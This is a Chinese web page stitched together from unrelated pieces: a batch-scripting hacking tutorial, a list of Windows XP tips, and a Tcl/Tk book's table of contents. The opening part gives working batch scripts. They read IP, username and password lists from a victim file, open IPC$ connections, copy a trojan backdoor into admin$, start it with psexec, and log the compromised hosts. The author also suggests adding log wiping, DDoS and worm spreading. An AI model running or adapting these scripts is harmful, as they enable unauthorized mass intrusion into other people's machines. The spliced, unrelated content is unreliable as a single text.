(victim.txt) do start call door.bat %%i %%j %%k tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。 delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。 代码雏形: --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- ------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \\%1\ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt @psexec \\%1 c:\winnt\system32\windrv32.exe @psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. No.2 二.如何在批处理文件中使用参数 批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。 sample1:fomat.bat @echo off if "%1"=="a" format a: :format @format a:/q/u/auotset @echo please insert another disk to driver A. @pause @goto fomat 这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^ sample2: 当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。 @echo off @net use \\1%\ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。 @if errorlevel 1 echo connection failed 怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3 三.如何使用组合命令(Compound Command) 1.& Usage:第一条命令 & 第二条命令 [& 第三条命令...] 用这种方法可以同时执行多条命令,而不管命令是否执行成功 Sample: C:\>dir z: & dir c:\Ex4rch The system cannot find the path specified. Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:\Ex4rch 2002-05-14 23:51 . 2002-05-14 23:51 .. 2002-05-14 23:51 14 sometips.gif 2.&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令; Sample: C:\>dir z: && dir c:\Ex4rch The system cannot find the path specified. C:\>dir c:\Ex4rch && dir z: Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:\Ex4rch 2002-05-14 23:55 . 2002-05-14 23:55 .. 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 2 Dir(s) 768,671,744 bytes free The system cannot find the path specified. 在做备份的时候可能会用到这种命令会比较简单,如: dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:\backup 如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :) 3.|| Usage:第一条命令 || 第二条命令 [|| 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令; Sample: C:\Ex4rch>dir sometips.gif || del sometips.gif Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of C:\Ex4rch 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 0 Dir(s) 768,696,320 bytes free 组合命令使用的例子: sample: @copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
什么是实用技巧,就是那种能经常用得着的值得收藏起来的应用方法。本文 中笔者就将向大家介绍35种Windows操作系统技巧,招招实用,招招值得你把 他保存到你的电脑中或者把这篇文章的地址收藏到收藏夹里。   1、如何实现关机时清空页面文件   打开“控制面板”,单击“管理工具→本地安全策略→本地策略→安全 选项”,双击其中“关机:清理虚拟内存页面文件”一项,单击弹出菜单中 的“已启用”选项,单击“确定”即可。   2、如何自行配置Windows XP的服务   如果你是在单机使用Windows XP,那么很多服务组件是根本不需要的, 额外的服务程序影响了系统的速度,完全可将这些多余的服务组件禁用。单 击“开始→控制面板→管理工具→服务”,弹出服务列表窗口,有些服务已 经启动,有些则没有。我们可查看相应的服务项目描述,对不需要的服务予 以关闭。如“Alerter”,如果你未连上局域网且不需要管理警报,则可将其 关闭。   3、Smartdrv程序有什么作用   现象:在许多有关Windows XP安装的介绍文章中都提到:“如果在DOS下 安装Windows XP非常慢,肯定是安装前未运行Smartdrv.exe。我想问这个 Smartdrv.exe文件有什么饔?具体如何使用?   Smartdrv.exe这个文件对于熟悉DOS的朋友肯定很清楚,主要作用是为磁 盘文件读写增加高速缓存。大家知道内存的读写速度比磁盘高得多,如果将 内存作为磁盘读写的高速缓存可以有效提高系统运行效率。Smartdrv.exe这 个文件在Windows各个版本的安装光盘中或是硬盘上的Windows/command/里都 有,只有几十KB,把这个文件复制到软盘下,启动系统后直接运行这个程序( 可以不加参数,该程序会自动根据内存大小分配适当的内存空间作为高速缓 存),再安装Windows XP即可。另外提醒大家,这个程序在安装完Windows后 ,不要运行,否则Windows可用内存将减少。   4、Win32k.sys是什么文件   现象:我刚装了Windows XP,可是接下去再装毒霸就发现病毒,位于 F:WINNT SYSTEM32里的Win32k.sys文件,删又不可删,隔离又不行,在 Windows 98下或DOS下删就会导致Windows XP不可启?,请问该文件是干什么 用的,有什么方法解决?   这个文件是Windows XP多用户管理的驱动文件。在 X:WindowsSystem32Dllcache目录下有此文件的备份。只要将此备份拷到 X:WindowsSystem32下替代带病毒的文件即可。做一张Windows 98启动盘,并 将Attrib.exe文件拷入软盘,此文件在装有Windows 98的机器上的 X:WindowsCommand目录下。在BIOS的Advanced BIOS Features 中将启动顺序 调整为从A盘启动,进入DOS后,进入X:WindowsSystem32目录,输入Attrib -s -h -r win32k.sys,再进入X:WindowsSystem32dllcache目录下输入同样 命令,再用copy win32k.sys X:windowsSystem32覆盖原文件,再重新启动即 可。   5、Windows XP的开机菜单有什么含义   现象:最近我安装了Windows XP操作系统,我知道在启动时按F8键或当 计算机不能正常启动时,就会进入Windows XP启动的高级选项菜单,在这里 可以选择除正常启动外的8种不同的模式启动Windows XP。请问这些模式分别 代表什么意思?   (1)安全模式:选用安全模式启动Windows XP时,系统只使用一些最基本 的文件和驱动程序启动。进入安全模式是诊断故障的一个重要步骤。如果安 全模式启动后无法确定问题,或者根本无法启动安全模式,那你就可能需要 使用紧急修复磁盘ERD的功能修复系统了。   (2)网络安全模式:和安全模式类似,但是增加了对网络连接的支持。在 局域网环境中解决Windows XP的启动故障,此选项很有用。   (3)命令提示符的安全模式:也和安全模式类似,只使用基本的文件和驱 动程序启动Windows XP。但登录后屏幕出现命令提示符,而不是Windows桌面 。   (4)启用启动日志:启动Windows XP,同时将由系统加载的所有驱动程序 和服务记录到文件中。文件名为ntbtlog.txt,位于Windir目录中。该日志对 确定系统启动问题的准确原因很有用。   (5)启用VGA模式:使用基本VGA驱动程序启动Windows XP。当安装了使 Windows XP不能正常启动的新显卡驱动程序,或由于刷新频率设置不当造成 故障时,这种模式十分有用。当在安全模式下启动Windows XP时,只使用最 基本的显卡驱动程序。   (6)最近一次的正确配置:选择“使用‘最后一次正确的配置’启动 Windows XP”是解决诸如新添加的驱动程序与硬件不相符之类问题的一种方 法。用这种方式启动,Windows XP只恢复注册表项 HklmSystemCurrentControlSet下的信息。任何在其他注册表项中所做的更改 均保持不变。   (7)目录服务恢复模式:不适用于Windows XP Professional。这是针对 Windows XP Server操作系统的,并只用于还原域控制器上的Sysvol目录和 Active Directory目录服务。   (8)调试模式:启动Windows XP,同时将调试信息通过串行电缆发送到其 他计算机。如果正在或已经使用远程安装服务在你的计算机上安装Windows XP,可以看到与使用远程安装服务恢复系统相关的附加选项。 6、如何彻底删除XP   现象:我装了Windows Me和Windows XP双系统,都是FAT32格式。C盘装 Windows Me,E盘装Windows XP。昨天,Windows XP系统丢失了SYSTEM32.DLL ,启动不了。于是我在进入Windows Me系统内,在E盘直接删除Windows XP。 但是,每次开机都出现多系统启动菜单,供选择。我该怎样才可以彻底删除 XP?   用一张Windows 9x/Me的启动盘启动,在“A:”下输入“SYS C:”,给C 盘重新传系统即可。   7、如何处理Windows XP不能自动关机现象   现象:我的Windows XP有时候不能自动关闭电脑,请问应该怎么办?   安装完Windows XP之后,有些计算机在单击关闭电脑之后并不能自动关 闭,而需像以前的AT电源一样手动关闭。这主要是Windows XP未启用高级电 源管理。修正方法:单击“开始→控制面板→能和维护→电源选项”,在弹 出的电源选项属设置窗口中,单击“高级电源管理”并勾选“启用高级电 源管理支持”。   8、如何创建“锁定计算机”的快捷方式   因有急事而需要离开,但又不希望电脑进行系统注销,该怎么办?你完 全可以通过双击桌面快捷方式来迅速锁定键盘和显示器,且无需使用 “Ctrl+Alt+Del”组合键或屏幕保护程序。操作方法:在桌面上单击鼠标右 键,在随后出现的快捷菜单上指向“新建”,并选择“快捷方式”。接着, 系统便会启动创建快捷方式向导。请在文本框中输入下列信息: rundll32.exe user32.dll, LockWorkStation,单击“下一步”。输入快捷 方式名称。你可将其命名为“锁定工作站”或选用你所喜欢的任何名称,单 击“完成”。你还可对快捷方式图标进行修改(我最喜欢的一个是由 Shell32.dll所提供的挂锁图标)。如需修改快捷方式图标,请执行下列操作 步骤:右键单击“快捷方式”,并在随后出现的快捷菜单上选择“属”。 选择“快捷方式”选项卡,接着,单击“更改图标”按钮。在以下文件中查 找图标文本框中,输入Shell32.dll,单击“确定”。从列表中选择所需图标 ,并单击“确定”。你还可为快捷方式指定一组快捷键,比如“Ctrl+Alt+L ”。这种做法虽然只能帮助你节省一次击键,但却可使操作变得更加灵便。 如需添加快捷键组合,请执行下列操作步骤:右键单击“快捷方式”,并在 随后出现的快捷菜单上选择“属”。选择“快捷方式”选项卡,在快捷键文 本框中,输入任何键值,而Windows XP则会将其转换成快捷键组合(一般应采 取Ctrl+Alt+任意键的形式)。如欲锁定键盘和显示器,只需双击相关快捷方 式或使用所定义的快捷键即可。   9、如何调整桌面图标颜色质量   在桌面空白处单击鼠标右键,在打开的“显示 属”对话框中选择“ 设置”选项卡,通过“颜色质量”下拉列表你可以调整计算机的颜色质量。 你也可以通过编辑注册表来调整桌面图标的颜色质量,具体操作步骤:   打开注册表编辑器,进入HKEY_CURRENT_ USERControl PanelDesktopWindowMetrics子键分支,双击Shell Icon BPP键值项,在打开 的“编辑字符串”对话框中,“数值数据”文本框内显示了桌面图标的颜色 参数,系统默认的图标颜色参数为16。这里提供的可用颜色参数包括 :4表 示16种颜色,8表示256种颜色,16表示65536种颜色,24表示1600万种颜色, 32表示True Color(真彩色)。你可以根据自己的不需要选择和设置你的桌面 图标颜色参数。单击“确定”关闭“编辑字符串”对话框。注销当前用户并 重新启动计算机后设置就生效。   在桌面空白处单击鼠标右键,在打开的“显示属”对话框中选择“外 观”选项卡,在这里你可以方便地对整个桌面、窗口或者其他项目的字体和 图标大小进行调整。   不过,用这种方式设置图标大小有一定局限,比如,用户只能选择系 统已经提供的桌面大小方案,不能自己任意设置桌面图标的大小。如果你想 随心所欲地对桌面图标大小进行调整,可以通过编辑注册表来达到目的。具 体操作步骤是: 打开注册表编辑器,进入HKEY_CURRENT_ USERControl PanelDesktopWindowMetrics子键分支,双击Shell Icon Size键值项,在打 开的“编辑字符串”对话框中,“数值数据”文本框内显示了桌面图标的大 小参数,系统默认29,用户可以根据自己的需要设置参数大小(参数越大,桌 面图标也越大),然后单击“确定”关闭“编辑字符串”对话框。当你注销当 前用户并重新启动计算机后设置就生效。   10、如何对系统声音进行选择与设置   系统声音的选择与设置就是为系统中的事件设置声音,当事件被激活时 系统会根据用户的设置自动发出声音提示用户。 选择系统声音的操作步骤如 下:   (1)在“控制面板”窗口中双击“声音及音频设备”图标,打开“声音及 音频设备”属对话框,它提供了检查配置系统声音环境的手段。这个对话 框包含了音量、声音、音频、语声和硬件共5个选项卡。   (2)在“声音”选项卡中,“程序事件”列表框中显示了当前Windows XP 中的所有声音事件。如果在声音事件的前面有一个“小喇叭”的标志,表示 该声音事件有一个声音提示。要设置声音事件的声音提示,则在“程序事件 ”列表框中选择声音事件,然后从“声音”下拉列表中选择需要的声音文件 作为声音提示。   (3)用户如果对系统提供的声音文件不满意,可以单击“浏览”按钮,弹 出浏览声音对话框。在该对话框中选定声音文件,并单击“确定”按钮,回 到“声音”选项卡。   (4)在Windows XP中,系统预置了多种声音方案供用户选择。用户可以从 “声音方案”下拉表中选择一个方案,以便给声音事件选择声音。   (5)如果用户要自己设置配音方案,可以在“程序事件”列表框中选择需 要的声音文件并配置声音,单击“声音方案”选项组中的“另存为”按钮, 打开“将方案存为”对话框。在“将此配音方案存为”文本框中输入声音文 件的名称后,单击“确定”按钮即可。如果用户对自己设置的配音方案不满 意,可以在“声音方案”选项组中,选定该方案,然后单击“删除”按钮, 删除该方案。   (6)选择“音量”选项卡,打开“音量”选项卡。你可以在“设备音量” 选项组中,通过左右调整滑块改变系统输出的音量大小。如果希望在任务栏 中显示音量控制图标,可以启用“将音量图标放入任务栏”复选框。   (7)你想调节各项音频输入输出的音量,单击“设备音量”区域中的“高 级”按钮,在弹出的“音量控制”对话框里调节即可。这里列出了从总体音 量到CD唱机、PC扬声器等单项输入输出的音量控制功能。你也可以通过选择 “静音”来关闭相应的单项音量。   (8)单击“音量”选项卡中的“扬声器设置”区域中的“高级”按钮后, 在弹出的“高级音频属”对话框你可以为自己的多媒体系统设定最接近你 的硬件配置的扬声器模式。   (9)在“高级音频属”对话框中选择“能”选项卡,这里提供了对音 频播放及其硬件加速和采样率转换质量的调节功能。要说明的是,并不是所 有的选项都是越高越好,你需要根据自己的硬件情况进行设定,较好的质量 通常意味着较高的资源占有率。   设置完毕后,单击“确定”按钮保存设置。 11、如何分配临时管理权限   许多程序在安装过程中都要求你具备管理权限。这里介绍了一种以普通 用户身份登录的情况下,临时为自己分配管理权限的简单方法。在右键单击 程序安装文件的同时按住“Shift”键。在随后出现的快捷菜单中单击“运行 方式”,输入具有相应管理权限的用户名和密码。这种方式对于开始菜单上 的应用程序同样适用。   12、如何关闭Windows XP的自动播放功能   一旦你将多媒体光盘插入驱动器,自动运行就会从驱动器中读取数据, 这会造成程序的设置文件和在音频媒体上的音乐立即开始。你可以用下面这 个办法关闭这个功能:打开“开始→运行”,在对话框中输入“gpedit.msc ”命令,在出现“组策略”窗口中依次选择“在计算机配置→管理模板→系 统”,双击“关闭自动播放”,在“设置”选项卡中选“已启用”选项,最 后单击“确定”按钮即可。   13、如何恢复被破坏的系统引导文件   现象:我只安装了Windows XP系统,但在开机时显示“BOOT.INI非法, 正从C:WINDOWS启动”,然后就进入了启动状态,并且也能照样工作,请问 这是怎么一回事,能否在不重装系统的情况下使系统恢复到正常启动状态?   出现这种情况是因为C盘下面的“Boot.ini”文件被破坏了。但是由于你 的机器中只有一个操作系统,当然它就是默认的操作系统,即使“Boot.ini ”文件被破坏了,也将自动地引导该系统进行装载。   解决的办法是建立一个“Boot.ini”文件即可。其内容为:   [Boot Loader]   Default=C:   [Operating Systems]   C:=“Microsoft Windows xp”   14、如何恢复输入法图标   现象:本人使用Windows XP中文版,不慎使任务栏隐藏了输入法图标, 请问该如何恢复输入法图标。   打开“控制面板”,双击“区域和语言选项”图标,进入“区域和语言 选项”对话框,选择“语言”选项卡,单击“详细信息”按钮,在弹出的对 话框中单击“语言栏”按钮,在接着出现的“语言栏设置”对话框中勾选“ 在桌面上显示语言栏”选项。这时候桌面会出现语言栏,单击右上角的最小 化按钮,输入法图标就回到任务栏中去了。   15、如何恢复误删除的boot.ini文件   现象:我第一次装Windows XP时,重启后没有任何问题。但是由于误操 作,删掉了C盘目录下的一个文件(文件名是:boot.ini),然后再重启时每次 都显示两行字:“boot.ini是非法的。现在正从C:/Windows/下启动”。然后 可以顺利进入Windows XP。但是速度明显慢了,比没删这个文件时慢了很多 ,而且,每次都要看见那两行字。请问如何修复?   boot.ini是系统启动时,需要查询的一个系统文件,它告诉启动程序本 计算机有几个操作系统、各系统的位置在哪里等信息。重新恢复的方法如下 :单击“开始”菜单,依次指向“程序→附件→记事本”,打开“记事本” ,在记事本里输入:   [boot loader]   timeout=30   default=multi(0)disk(0)rdisk(0)partition(1) Windows   [operating systems]   multi(0)disk(0)rdisk(0)partition(1)Windows=“Microsoft Windows XP Professional” /fastdetect   然后将它保存为名字是boot.ini的文件,并将此文件保存到C盘的根目录 下即可。   16、如何加快Windows XP窗口显示速度   我们可以通过修改注册表来改变窗口从任务栏弹出,以及最小化回归任 务栏的动作,步骤如下:打开注册表编辑器,找到HKEY_ CURRENT_USERControl PanelDesktop WindowMetrics子键分支,在右边的窗 口中找到MinAnimate键值,其类型为REG_SZ,默认情况下此健值的值为1,表 示打开窗口显示的动画,把它改为0,则禁止动画的显示,接下来从开始菜单 中选择“注销”命令,激活刚才所作的修改即可。   17、如何解决Windows XP关机出现英文提示   现象:我的Windows XP关机时会出现一个进度条,并提示“To return to windows and check the status of the program click cancel if you choose to end the program immediately you will lose any unsaved data. To end the program now click end.”然后就正常关机,但有时却不 出现,我想会不会与我的东方影都3的记忆播放有关,但关闭记忆播放功能也 无效,请问如何办?   这是因为你关闭Windows XP时还有程序在运行,请在关机之前保存并关 闭一切应用程序。如果直接单击“End”按钮,那么未保存的任务会丢失,这 时可以按“Ctrl+Alt+Del”打开任务管理器,然后关闭应用程序。如果在任 务管理器列表中为空,那么就在“系统进程”中将它关闭。如果不进行任何 操作,那么系统将在进度条到头时自动关闭未关闭的程序并关闭系统。请你 在关机之前关闭一切应用程序、系统驻留程序就不会出现这个提示了。当你 确定没有任何需要保存的任务时,可以不必理会此对话框。 18、如何控制桌面的图标显示   通常很多用户还是习惯于在桌面上保留“我的文档”及其他经常访问文 件夹快捷方式以及经常使用的程序快捷方式。如果你想在桌面上显示“我的 电脑”、“我的文档”、“网上邻居”、IE浏览器的快捷方式图标,只需进 行如下操作 :在桌面单击鼠标右键,在右键菜单中选择“属命令,在打 开的“显示 属”对话框中选择“桌面”选项卡,单击“自定义桌面”按钮 ,打开“桌面”项目对话框。在“常规”选项卡的“桌面图标”栏中选择所 需项目的复选框,然后单击“确定”返回上一级对话框,再单击“应用”按 钮即可。   19、如何删除Windows XP的“更新”选项   对于大多数的用户来说,Windows XP的Windows Update功能似乎作用不 大,我们可以去掉它,操作步骤如下:打开注册表编辑器,找到 HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVersionPoliciesExplorer子键分支,选择“编辑 ”菜单下的“新建”命令,新建一个类型为REG_DWord的值,名称为 NoCommonGroups,双击新建的NoCommon Groups子键,在“编辑字符串”文本 框中输入键值“1”,然后单击“确定”按钮并重新启动系统即可。   20、如何设置音频属   打开“控制面板”,双击“声音及音频设备”图标,在“声音及音频设 备 属”对话框中,选择“音频”选项卡,在该选项卡中,你可以看到与“ 声音播放”、“录音”和“MIDI音乐播放”有关的默认设备。当你的计算机 上安装有多个音频设备时,就可以在这里选择应用的默认设备,并且还可以 调节其音量及进行高级设置。   进行音频设置的操作步骤如下:   (1)在“声音播放”选项组中,从“默认设备”下拉列表中选择声音播放 的首选设备,一般使用系统默认设备。   (2)用户如果希望调整声音播放的音量,可以单击“音量控制”窗口,在 该窗口中,将音量控制滑块上下拖动即可调整音量大小。   (3)在该窗口中,用户可以为不同的设备设置音量。例如,当用户在播放 CD时,调节“CD音频”选项组中的音量控制滑块,可以改变播放CD的音量; 当用户播放MP3和WAV等文件时,用户还可以在“音量控制”窗口进行左右声 道的平衡、静音等设置。   (4)用户如果想选择扬声器或设置系统的播放能,可以单击“声音播放 ”选项组中的“高级”按钮,打开 “高级音频属”对话框,在“扬声器” 和“能”选项卡可以分别为自己的多媒体系统设定最接近你的硬件配置的 扬声器模式及调节音频播放的硬件加速功能和采样率转换质量。   (5)在“录音”选项组中,可以从“默认设备”下拉列表中选择录音默认 设备。单击“音量”按钮,打开 “录音控制”对话窗口。用户可以在该窗口 中改变录音左右声道的平衡状态以及录音的音量大小。   (6)在“MIDI音乐播放”选项组中,从“默认设备”下拉列表中选择 MIDI音乐播放默认设备。单击“音量”按钮,打开“音量控制”窗口调整音 量大小。   (7)如果用户使用默认设备工作,可启用“仅使用默认设备”复选框。设 置完毕后,单击“应用”按钮保存设置。   21、如何设置语声效果   用户在进行语声的输入和输出之前,应对语声属进行设置。在“声音 和音频设备 属”对话框中,选择“语声”选项卡,在该选项卡中,用户不 但可以为“声音播放”和“录音”选择默认设备,而且还可调节音量大小及 进行语声测试。   (1)在“声音播放”选项组中,从“默认设备”下拉列表中选择声音播放 的设备,单击“音量”按钮,打开“音量控制”窗口调整声音播放的音量。 要设置声音播放的高级音频属,单击“高级”按钮完成设置。   (2)在“录音”选项组中,从“默认设备”下拉列表中选择语声捕获的默 认设备,单击“音量”按钮,打开“录音控制”窗口调整语声捕获的音量。 要设置语声捕获的高级属,单击“高级”按钮完成设置。   (3)单击“测试硬件”按钮,打开 “声音硬件测试向导”对话框,该向 导测试选定的声音硬件是否可以同时播放声音和注册语声。注释:要确保测 试的准确,在测试之前必须关闭使用麦克风的所有程序,如语声听写或语 声通信程序。   (4)单击“下一步”按钮,向导开始测试声音硬件,并通过对话框显示检 测进度。   (5)检测完毕后,打开“正在完成声音硬件测试向导”对话框,通告用户 检测结果,单击“完成”按钮关闭对话框。   (6)设置完毕后,单击“确定”按钮保存设置。   22、如何手动使计算机进入休眠状态   现象:请问如何用手动方式使Windows XP的计算机进入休眠状态?   休眠功能是Windows XP提供的一项非常酷的特,它“隐藏”在Shut Down(关机)对话框中。如果你的计算机支持休眠功能,那么借助以下技巧, 可通过手动方式使其进入休眠状态。 如需以手动方式使你的计算机进入休眠 状态,请执行以下操作步骤: 选择“开始→关闭计算机”,在关闭Windows 对话框中,选择“休眠”。当你的计算机进入休眠状态后,内存中的内容将 保存到硬盘上。当你将计算机唤醒时,进入休眠状态前打开的所有程序与文 档都将恢复到桌面上。如需在你的计算机上激活休眠支持特,请执行以下 操作步骤:你必须以管理员、Administrators或Power Users组成员的身份登 录。如果你的计算机与某个网络建立了连接,那么网络策略设置可能会导致 这一操作过程无法实现。单击“开始→控制面板→能和维护→电源选项” ,选择“休眠”选项卡,选中“启用休眠”,单击“确定”关闭电源选项对 话框。如果休眠选项卡不可用,则说明你的硬件设备无法支持该特。   23、如何提高Windows XP的启动速度   使用微软提供的“Bootvis”软件可以有效地提高Windows XP的启动速度 。这个工具是微软内部提供的,专门用于提升Windows XP启动速度。下载解 压缩到一个文件夹下,并在“Options”选项中设置使用当前路径。之后从“ Trace”选项下拉菜单中选择跟踪方式。该程序会引导Windows XP重新启动, 并记录启动进程,生成相关的BIN文件。之后从Bootvis中调用这个文件,从 Trace项下拉菜单中选择“Op-timizesystem”命令即可。   Windows XP虽然提供了一个非常好的界面外观,但这样的设置也在极大 程度上影响了系统的运行速度。如果你的电脑运行起来速度不是很快,建议 将所有的附加桌面设置取消,也就是将Windows XP的桌面恢复到Windows 2000样式。   设置的方法非常简单:在“我的电脑”上单击鼠标右键,选择“属” ,在“高级”选项卡中单击“能”项中的“设置”按钮,在关联界面中选 择“调整为最佳能”复选框即可。   此外,一个对Windows XP影响重大的硬件就是内存。使用256MB内存运行 Windows XP会比较流畅,512MB的内存可以让系统运行得很好。如果条件允许 ,最好增大内存。   24、如何为Windows XP减肥   Windows XP比以往的任何Windows系统都要庞大,其硬盘空间需求1.5GB 。虽然相对于能跑Windows XP的主流电脑来说,一般都拥有10GB以上的硬盘 ,但一些电脑发烧友有时还是乐于减少Windows XP的体积。   (1)删除驱动备份 :WindowsDriver cachei386目录下的Driver.cab文件 (73MB) 。   (2)删除Help文档(减掉40多MB) 。   (3)删除WindowsIme下不用的输入法(日文、韩文、约80MB) 。   (4)把我的文件、IE的临时文件夹转到其他硬盘(分区) 。   (5)把虚拟内存转到其他硬盘(分区)。   25、如何卸载Windows XP   现象:我原来使用的操作系统是Windows 98,最近听说Windows XP非常 好,就安装了该系统。第一次安装是从Windows 98中安装,装完后觉得不太 好,就格式化Windows XP的分区后重新从DOS安装到D盘,安装完后发现多重 启动菜单有三项(第一次装的Windows XP那一项还在),请问如何删除多余的 一项?另外,如果我要删除Windows XP,除了格式化D盘外,怎样才能将它彻 底删除?   Windows 98和Windows XP双系统的启动菜单是由C盘根目录下的一个文件 来控制的,通过修改该文件可以更改启动菜单。要想删除多余的Windows XP 项目,你可以打开C盘根目录下的boot.ini文件,其中有两行重复的“multi (0)…”,删除其中一行即可。要想彻底删除Windows XP,除了格式化它所在 分区之外,你还必须按下面的方法删除多重启动菜单和多余的系统文件:   (1)制作一张Windows 98启动盘,并将Windows 98下的sys.com文件拷入 该系统盘。   (2)用该启动盘启动,在A:>下执行sys C:命令。   (3)删除C盘根目录下多余的文件,这些文件包括:boot.ini、 bootfont.bin、bootsect.dos、ntdetect.com、pagefile.sys等。
Tcl_TK编程权威指南pdf 内容简介回到顶部↑Tcl/Tk是第一种能通过Windows、Macintosh和Solaris等主要平台处理企业级任务的脚本语言。本书共分为55章,依次详细讲述了Tcl基础、Tcl高级特、TK基础、TK组件、TK详解、C语言编程、各版本之间的差异等方面的知识,并通过大量实例,生动翔实地向读者介绍了Tcl/Tk编程,是读者掌握Tcl/Tt的必备参考书。 本书适合各个层次的读者阅读。 目录回到顶部↑第1部分 tcl基础 第1章 tcl的基本知识 tcl命令 hello,world! 变量 命令替换 数学表达式 反斜杠替换 使用花括号和双引号进行分组 过程 一个阶乘的例子 更多有关变量的知识 更多有关数学表达式的内容 注释 有关替换与分组的总结 要点 参考 第2章 开始使用 source命令 unix上的tcl脚本程序 .windows 95的开始菜单 macintosh与resedit console命令 命令行变元 预定义变量 第3章 cgi应用程序--顾客留言簿 html简介 使用cgi创建动态页面 guestbook.cgi脚本程序 定义表单以及处理表单数据 cgi.tcl软件包 接下去的几步 第4章 tcl中的字符串处理 string命令 append命令 format命令 scan命令 binary命令 相关章节 第5章 tcl列表 tcl列表 构建列表 获取列表元素 修改列表 搜索列表 对列表进行排序 split命令 join命令 相关章节 第6章 控制结构命令 if then else switch while foreach for break与continue catch error return 第7章 过程与作用域 proc命令 使用rename来改变命令名 作用域 global命令 通过upvar以名字进行调用 使用upvar来处理变量别名 第8章 tcl数组 数组的语法 array命令 使用数组来构建数据结构 第9章 对文件和程序的操作 使用exec运行程序 file命令 跨平台的文件命名方式 操作文件和目录 文件属 对i/o命令的总结 打开文件用于i/o操作 读写操作 当前目录-cd和pwd 使用glob来匹配文件名 exit和pid命令 环境变量 registry命令 第2部分tcl高级特 第10章 引用问题与eval 使用list命令来构建代码 在eval内部利用concat uplevel命令 subst命令 第11章 正则表达式 何时使用正则表达式 正则表达式的语法 高级正则表达式(are) 语法总结 regexp命令 rgsub命令 使用regsub将数据转换为程序 其他使用正则表达式的命令 第12章 脚本库及软件包 确定软件包的位置:auto-path变量 使用软件包 对软件包加载的总结 package命令 基于文件tclindex的库 unknown命令 方便交互 tclshell的库环境 编码风格 第13章 反射与调试 clock命令 info命令 跨平台支持 跟踪变量的值 交互式命令历史记录 调试 scriptics的tclpro 其他工具 能调校 第14章 名字空间 使用名字空间 名字空间变量 命令查找 嵌套名字空间 过程的进口与输出 回调与名字空间 内省(introspection) namespace命令 转换现有的软件包以使用名字空间 [incrtcl]对象系统 注意事项 第15章 国际化(internationalization) 字符集与编码 消息目录 第16章 事件驱动的编程 tcl事件循环 after命令 fileevent命令 vwait命令 fconfigure命令 第17章 套接字编程 客户端套接字 服务器端套接字 回送(echo)服务 使用http获取一个url http软件包 基本认证 第18章 tclhttpd web服务器 将 tclhttpd与你的应用程序集成 域处理程序 应用执导的url 文档类型 html+tcl模板 表单处理程序 编程参考 标准应用执导(application-dirct)的url tclhttpd发行版 服务器配置 第19章 多解释器与 safe-tcl interp命令 创建解释器 安全解释器 命令别名 隐藏命令 替换 从安全解释器中执行i/o操作 安全基础 安全策略 第20章 safe-tk与浏览器插件 子解释器中的tk 浏览器插件 安全策略与浏览器插件 配置安全策略 第3部分 tk基础 第21章 tk的基本知识 th中的hello,world! tk组件的命名 配置tk组件 tk组件属与资源数据库 tk命令概要 第22章 tk实例解析 execlog example browser tcl shell 第23章 打包摆放布局管理器(pack) 朝一侧摆放 水平与垂直难叠 空腔模型( cavity model) 打包摆放空间(packing space)与显w空间(display space) 尺寸调整与一expand 挂靠 摆放顺序 选择用于摆放的父组件 取消一个组件的摆放 打包器总结 窗口的堆叠顺序 第24章 栅格摆放布局管理器( grid) 一种基本栅格 跨行列摆放 行列约束 grid命令 第25 章定位摆放布局管理器( place) place的基础知识 面板管理器 place命令 第26章 将命令与事件编联 bind命令 bindtags命令 事件的语法 修饰符 事件序列 虚拟事件 事件关键词 第4部分 tk组件 第27章 按钮与菜单 按钮命令与作用域问题 与tcl变量关联的按钮 按钮属 按钮操作 菜单和菜单按钮 键盘遍历 操纵菜单和菜单条目 菜单属 通过名字来指定菜单的软件包 第28章 资源数据库 有关资源的介绍 加载选项数据库 添加单一的数据库条目 存取数据库 